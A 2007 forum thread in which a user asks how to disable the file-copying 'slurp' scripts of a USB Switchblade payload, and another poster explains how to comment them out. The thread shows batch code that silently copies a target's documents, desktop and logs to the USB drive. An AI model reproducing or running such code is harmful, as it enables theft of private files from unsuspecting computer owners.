Nameless Posted July 8, 2007

How would I go about disabling the slurp commands in my switchblade? This is the code for fc_slurp2.bat:

    :: These first two commands copy the entire contents of the current user's My Documents and Desktop folders

    :: My Documents files
    mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments
    fc.exe "C:Documents and Settings%username%My Documents*" "....Documentslogfiles%computername%Slurp_DataMyDocuments*" /i /o

    :: Desktop files
    mkdir ....Documentslogfiles%computername%Slurp_DataDesktop
    fc.exe "C:Documents and Settings%username%Desktop*" "....Documentslogfiles%computername%Slurp_DataDesktop*" /i /o

    :: These last two commands copy the entire contents of the Shared Documents and All Users Desktop folders

    :: All Users Desktop files
    mkdir ....Documentslogfiles%computername%Slurp_DataSharedDesktop
    fc.exe "C:Documents and SettingsAll UsersDesktop*" "....Documentslogfiles%computername%Slurp_DataSharedDesktop*" /i /o

    :: All Users Documents files
    mkdir ....Documentslogfiles%computername%Slurp_DataSharedDocuments
    fc.exe "C:Documents and SettingsAll UsersShared Documents*" "....Documentslogfiles%computername%Slurp_DataSharedDocuments*" /i /o

I am using the pocketknife payload. Thanks for the help.

Sparda Posted July 8, 2007

Comment them out?

Nameless Posted July 8, 2007

Yeah, I want to stop them from running.

Leapo Posted July 9, 2007

Ok, we have a few things to go over here.

When you "comment something out", you're telling the computer to ignore a specific command and continue down to the next thing that isn't commented out. You'll probably notice all of my batch file comments have a "::" before them; this is so my comments aren't read when my code is executed. You can also use :: to disable certain aspects of my batch files by simply adding :: in front of the code you want disabled.

You may also want to go back and thoroughly read the included readme, as it appears you may have skipped a bit. For my payload, when you want to disable something, you don't need to edit the individual batch files; everything is controlled from within Start.bat (which is also fully commented).

Navigate to WIPCMD and edit Start.bat by commenting out the lines that start fc_slurp and fc_slurp2.bat. Here's what the section of Start.bat pertaining to file slurping should look like after you've commented out the entries:

    :: Slurps smaller files like logs, chat logs, bookmarks, etc from the target. This component
    :: of slurp should be safe to run on smaller storage devices and flash drives, because it
    :: shouldn't need to copy anything larger than a log file.
    ::
    :: In any case, keep in mind it'll probably take a while to copy over everything (a few minutes).
    ::nircmd execmd CALL .fc_slurp.bat

    :: Slurps everything in the My Documents, Shared Documents, and the desktop (includes sub-folders).
    :: This second component of slurp will most likely copy a LOT of large files to the switchblade.
    ::
    :: This is turned on by default, but you might want to disable this if you're not running from a
    :: decently large storage device (like an external hard disk).
    ::
    :: In any case, keep in mind it'll probably take a while to copy over everything (depending on what
    :: the target has stored in their My Documents folder).
    ::nircmd execmd CALL .fc_slurp2.bat

As simple as that, all I did was add a :: to the lines that started the batch files.

Nameless Posted July 10, 2007

Thanks man, that explains a lot. I'm trying to learn as much about this stuff as I can.